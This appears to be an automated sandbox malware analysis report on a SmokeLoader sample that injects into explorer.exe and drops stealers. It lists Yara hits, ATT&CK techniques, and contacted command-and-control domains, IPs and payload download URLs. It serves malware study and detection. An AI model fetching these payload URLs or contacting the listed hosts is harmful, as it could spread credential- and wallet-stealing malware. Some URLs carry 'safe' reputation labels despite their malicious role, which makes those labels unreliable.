                  Source: Yara matchFile source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAD0C40 sqlite3_bind_zeroblob,13_2_6CAD0C40
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAD0D60 sqlite3_bind_parameter_name,13_2_6CAD0D60
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F8EA0 sqlite3_clear_bindings,13_2_6C9F8EA0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CAD0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,13_2_6CAD0B40
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F6410 bind,WSAGetLastError,13_2_6C9F6410
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F60B0 listen,WSAGetLastError,13_2_6C9F60B0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9FC030 sqlite3_bind_parameter_count,13_2_6C9FC030
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9FC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,13_2_6C9FC050
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F6070 PR_Listen,13_2_6C9F6070
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9822D0 sqlite3_bind_blob,13_2_6C9822D0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F63C0 PR_Bind,13_2_6C9F63C0

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		14
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Shared Modules                  		Boot or Logon Initialization Scripts812
                  Process Injection                  		4
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		12
                  File and Directory Discovery                  		Remote Desktop Protocol41
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution                  		Logon Script (Windows)Logon Script (Windows)22
                  Software Packing                  		Security Account Manager37
                  System Information Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		4
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  PowerShell                  		Login HookLogin Hook1
                  DLL Side-Loading                  		NTDS1
                  Network Share Discovery                  		Distributed Component Object Model2
                  Clipboard Data                  		125
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  File Deletion                  		LSA Secrets551
                  Security Software Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Masquerading                  		Cached Domain Credentials22
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                  Virtualization/Sandbox Evasion                  		DCSync3
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job812
                  Process Injection                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Hidden Files and Directories                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447731 Sample: c3f3d7cea638c32610d85c9c1df... Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 61 whispedwoodmoodsksl.shop 2->61 63 steamcommunity.com 2->63 65 dbfhns.in 2->65 89 Snort IDS alert for network traffic 2->89 91 Multi AV Scanner detection for domain / URL 2->91 93 Found malware configuration 2->93 95 16 other signatures 2->95 11 c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe 2->11         started        14 aarhevh 2->14         started        16 aarhevh 2->16         started        signatures3 process4 signatures5 121 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->121 123 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 11->123 125 Maps a DLL or memory area into another process 11->125 127 Creates a thread in another existing process (thread injection) 11->127 18 explorer.exe 91 7 11->18 injected 129 Antivirus detection for dropped file 14->129 131 Multi AV Scanner detection for dropped file 14->131 133 Machine Learning detection for dropped file 14->133 135 Checks if the current machine is a virtual machine (disk enumeration) 16->135 process6 dnsIp7 67 dbfhns.in 187.143.58.5, 49711, 49712, 49713 UninetSAdeCVMX Mexico 18->67 69 23.145.40.124, 49725, 80 SURFAIRWIRELESS-IN-01US Reserved 18->69 71 3 other IPs or domains 18->71 43 C:\Users\user\AppData\Roaming\aarhevh, PE32 18->43 dropped 45 C:\Users\user\AppData\Local\Temp\C9A7.exe, PE32 18->45 dropped 47 C:\Users\user\AppData\Local\Temp\21AE.exe, PE32 18->47 dropped 49 C:\Users\user\...\aarhevh:Zone.Identifier, ASCII 18->49 dropped 97 System process connects to network (likely due to code injection or exploit) 18->97 99 Benign windows process drops PE files 18->99 101 Deletes itself after installation 18->101 103 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->103 23 C9A7.exe 1 18->23         started        27 21AE.exe 18->27         started        file8 signatures9 process10 dnsIp11 51 C:\Users\user\AppData\Local\...\katA304.tmp, PE32 23->51 dropped 105 Machine Learning detection for dropped file 23->105 107 Contains functionality to inject code into remote processes 23->107 109 Writes to foreign memory regions 23->109 117 3 other signatures 23->117 30 katA304.tmp 1 46 23->30         started        73 whispedwoodmoodsksl.shop 188.114.97.3, 443, 49720, 49722 CLOUDFLARENETUS European Union 27->73 75 185.235.137.54, 49729, 80 AFRARASAIR Iran (ISLAMIC Republic Of) 27->75 111 Antivirus detection for dropped file 27->111 113 Multi AV Scanner detection for dropped file 27->113 115 Detected unpacking (changes PE section rights) 27->115 119 5 other signatures 27->119 35 WerFault.exe 21 27->35         started        file12 signatures13 process14 dnsIp15 77 steamcommunity.com 104.102.42.29, 443, 49746 AKAMAI-ASUS United States 30->77 79 65.109.242.59, 443, 49748, 49750 ALABANZA-BALTUS United States 30->79 53 C:\Users\user\AppData\...\softokn3[1].dll, PE32 30->53 dropped 55 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 30->55 dropped 57 C:\Users\user\AppData\...\mozglue[1].dll, PE32 30->57 dropped 59 10 other files (6 malicious) 30->59 dropped 81 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 30->81 83 Found many strings related to Crypto-Wallets (likely being stolen) 30->83 85 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 30->85 87 5 other signatures 30->87 37 cmd.exe 30->37         started        file16 signatures17 process18 process19 39 conhost.exe 37->39         started        41 timeout.exe 37->41         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe55%ReversingLabsWin32.Trojan.SmokeLoader
                  c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe59%VirustotalBrowse
                  c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe100%AviraTR/Crypt.XPACK.Gen
                  c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\21AE.exe100%AviraTR/AVI.AceCrypter.javlp
                  C:\Users\user\AppData\Roaming\aarhevh100%AviraTR/Crypt.XPACK.Gen
                  C:\Users\user\AppData\Local\Temp\C9A7.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\21AE.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\aarhevh100%Joe Sandbox ML
                  C:\ProgramData\GIEHIDHJDBFI\freebl3.dll0%ReversingLabs
                  C:\ProgramData\GIEHIDHJDBFI\mozglue.dll0%ReversingLabs
                  C:\ProgramData\GIEHIDHJDBFI\msvcp140.dll0%ReversingLabs
                  C:\ProgramData\GIEHIDHJDBFI\nss3.dll0%ReversingLabs
                  C:\ProgramData\GIEHIDHJDBFI\softokn3.dll0%ReversingLabs
                  C:\ProgramData\GIEHIDHJDBFI\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\21AE.exe92%ReversingLabsWin32.Spyware.Lummastealer
                  C:\Users\user\AppData\Local\Temp\katA304.tmp4%ReversingLabs
                  C:\Users\user\AppData\Roaming\aarhevh55%ReversingLabsWin32.Trojan.SmokeLoader

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  whispedwoodmoodsksl.shop17%VirustotalBrowse
                  steamcommunity.com0%VirustotalBrowse
                  dbfhns.in5%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://player.vimeo.com0%URL Reputationsafe
                  https://player.vimeo.com0%URL Reputationsafe
                  https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                  https://excel.office.com0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE0%URL Reputationsafe
                  http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                  https://www.youtube.com0%URL Reputationsafe
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
                  https://steam.tv/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=0%URL Reputationsafe
                  http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                  https://mozilla.org0/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;0%URL Reputationsafe
                  http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://store.steampowered.com/points/shop/0%URL Reputationsafe
                  http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK0%URL Reputationsafe
                  https://sketchfab.com0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://lv.queniujq.cn0%URL Reputationsafe
                  https://outlook.com0%URL Reputationsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                  https://www.youtube.com/0%URL Reputationsafe
                  https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                  https://whispedwoodmoodsksl.shop/api100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
                  https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                  https://android.notify.windows.com/iOS0%URL Reputationsafe
                  http://23.145.40.124/pintxi1lv.exe0%Avira URL Cloudsafe
                  https://checkout.steampowered.com/0%URL Reputationsafe
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                  https://store.steampowered.com/;0%URL Reputationsafe
                  https://store.steampowered.com/about/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/0%URL Reputationsafe
                  https://word.office.comon0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%Avira URL Cloudsafe
                  https://steamcommunity.com/profiles/76561199689717899Y0%Avira URL Cloudsafe
                  https://65.109.242.59/0%Avira URL Cloudsafe
                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%Avira URL Cloudsafe
                  https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
                  https://steamcommunity.com/profiles/76561199689717899Y0%VirustotalBrowse
                  https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                  whispedwoodmoodsksl.shop100%Avira URL Cloudmalware
                  http://guteyr.cc/tmp/index.php0%Avira URL Cloudsafe
                  https://65.109.242.59/7%VirustotalBrowse
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                  https://www.google.com0%Avira URL Cloudsafe
                  https://65.109.242.59/nss3.dll0%Avira URL Cloudsafe
                  http://guteyr.cc/tmp/index.php16%VirustotalBrowse
                  https://whispedwoodmoodsksl.shop/api17%VirustotalBrowse
                  http://185.235.137.54/file/host_so.exe100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%VirustotalBrowse
                  whispedwoodmoodsksl.shop17%VirustotalBrowse
                  https://65.109.242.59/g0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll0%VirustotalBrowse
                  https://65.109.242.59/l0%Avira URL Cloudsafe
                  https://65.109.242.59/k0%Avira URL Cloudsafe
                  https://whispedwoodmoodsksl.shop/apie100%Avira URL Cloudmalware
                  http://185.235.137.54/file/host_so.exe20%VirustotalBrowse
                  https://s.ytimg.com;0%Avira URL Cloudsafe
                  https://t.me/copterwin0%Avira URL Cloudsafe
                  https://65.109.242.59/g0%VirustotalBrowse
                  https://65.109.242.59/r0%Avira URL Cloudsafe
                  https://www.google.com0%VirustotalBrowse
                  https://65.109.242.59/k0%VirustotalBrowse
                  miniaturefinerninewjs.shop100%Avira URL Cloudmalware
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;0%Avira URL Cloudsafe
                  https://whispedwoodmoodsksl.shop/apie14%VirustotalBrowse
                  https://65.109.242.59/softokn3.dll0%Avira URL Cloudsafe
                  https://65.109.242.59/mozglue.dllao0%Avira URL Cloudsafe
                  https://65.109.242.59/l5%VirustotalBrowse
                  https://steamcommunity.com/m0%Avira URL Cloudsafe
                  https://t.me/copterwin1%VirustotalBrowse
                  obsceneclassyjuwks.shop0%Avira URL Cloudsafe
                  https://t.me/copterwinr0isMozilla/5.00%Avira URL Cloudsafe
                  miniaturefinerninewjs.shop19%VirustotalBrowse
                  https://steamcommunity.com/m0%VirustotalBrowse
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;0%VirustotalBrowse
                  https://65.109.242.59/H0%Avira URL Cloudsafe
                  https://t.me/copterwinr0isMozilla/5.00%VirustotalBrowse
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%Avira URL Cloudsafe
                  obsceneclassyjuwks.shop18%VirustotalBrowse
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  https://whispedwoodmoodsksl.shop/X100%Avira URL Cloudmalware
                  https://65.109.242.59JKFI0%Avira URL Cloudsafe
                  http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  whispedwoodmoodsksl.shop
                  		188.114.97.3
                  		truetrueunknown
                  steamcommunity.com
                  		104.102.42.29
                  		truetrueunknown
                  dbfhns.in
                  		187.143.58.5
                  		truetrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://whispedwoodmoodsksl.shop/apitrue
                  • 17%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://23.145.40.124/pintxi1lv.exetrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/false
                  • 7%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  whispedwoodmoodsksl.shoptrue
                  • 17%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://guteyr.cc/tmp/index.phptrue
                  • 16%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/nss3.dllfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://185.235.137.54/file/host_so.exefalse
                  • 20%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  miniaturefinerninewjs.shoptrue
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://65.109.242.59/softokn3.dllfalse
                  • Avira URL Cloud: safe
                  		unknown
                  obsceneclassyjuwks.shoptrue
                  • 18%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/freebl3.dllfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://45.129.96.86/file/update.exetrue
                  • 20%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://steamcommunity.com/profiles/76561199689717899true
                  • Avira URL Cloud: safe
                  		unknown
                  http://dbfhns.in/tmp/index.phptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://lobulraualov.in.net/tmp/index.phptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/mozglue.dllfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/vcruntime140.dllfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/sqls.dllfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtab21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://player.vimeo.comkatA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/ac/?q=21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://steamcommunity.com/?subsection=broadcastskatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://steamcommunity.com/profiles/76561199689717899YkatA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://store.steampowered.com/subscriber_agreement/katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.gstatic.cn/recaptcha/katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://excel.office.comexplorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tllkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englikatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.valvesoftware.com/legal.htmkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.youtube.comkatA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.google.comkatA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackkatA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/gkatA304.tmp, 0000000D.00000003.2699380936.00000000009C1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/lkatA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009D4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 5%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/kkatA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmpfalse
